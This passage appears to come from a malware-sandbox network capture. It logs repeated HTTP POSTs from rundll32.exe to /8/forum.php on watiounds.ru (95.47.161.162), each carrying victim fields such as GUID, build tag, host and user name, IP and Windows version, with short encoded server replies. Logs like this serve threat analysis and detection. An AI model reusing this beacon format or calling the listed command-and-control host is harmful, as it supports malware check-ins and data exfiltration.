                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:35.684824944 CEST66INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:35 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4d 5a 41 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cMZANARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          270192.168.2.224943595.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:26.635050058 CEST337OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:26.757733107 CEST338INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:26 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 4e 4d 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cCNMXARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          271192.168.2.224943695.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:27.072484970 CEST338OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:27.194560051 CEST339INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:27 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 48 53 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cCHSXARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          272192.168.2.224943795.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:27.512469053 CEST339OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:27.636106014 CEST340INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:27 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 5a 41 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZZAAARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          273192.168.2.224943895.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:27.954387903 CEST341OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:28.077712059 CEST341INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:28 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 56 4e 4d 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cVNMEARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          274192.168.2.224943995.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:28.394934893 CEST342OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:28.518426895 CEST342INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:28 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 48 5a 41 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cHZASARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          275192.168.2.224944095.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:28.832129002 CEST343OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:28.958154917 CEST343INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:28 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 4d 4e 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZMNAARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          276192.168.2.224944195.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:29.273956060 CEST344OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:29.405656099 CEST344INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:29 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 42 41 5a 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cBAZYARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          277192.168.2.224944295.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:29.727796078 CEST345OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:29.857126951 CEST345INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:29 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 56 41 5a 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cVAZEARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          278192.168.2.224944395.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:30.177864075 CEST346OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:30.302311897 CEST346INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:30 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 46 4d 4e 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cFMNUARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          279192.168.2.224944495.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:30.627310991 CEST347OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:30.750931978 CEST348INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:30 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4a 5a 41 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cJZAQARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          28192.168.2.224919395.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:21:36.003711939 CEST66OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:36.126219988 CEST67INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:36 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 46 43 58 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cFCXUARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          280192.168.2.224944595.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:31.065802097 CEST348OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:31.193687916 CEST349INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:31 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 56 4e 4d 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cVNMEARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          281192.168.2.224944695.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:31.514377117 CEST349OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:31.637969017 CEST350INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:31 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 41 4d 4e 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cAMNZARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          282192.168.2.224944795.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:31.957591057 CEST351OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:32.081218958 CEST351INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:32 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 54 4a 51 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cTJQGARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          283192.168.2.224944895.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:32.405915022 CEST352OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:32.528681040 CEST352INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:32 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 42 4e 4d 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cBNMYARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          284 | 192.168.2.22 | 49449 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:32.848551035 CEST | 353 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:32.971656084 CEST | 353 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:32 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 41 59 42 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cAYBZARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          285 | 192.168.2.22 | 49450 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:33.286834002 CEST | 354 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:33.407757044 CEST | 354 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:33 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
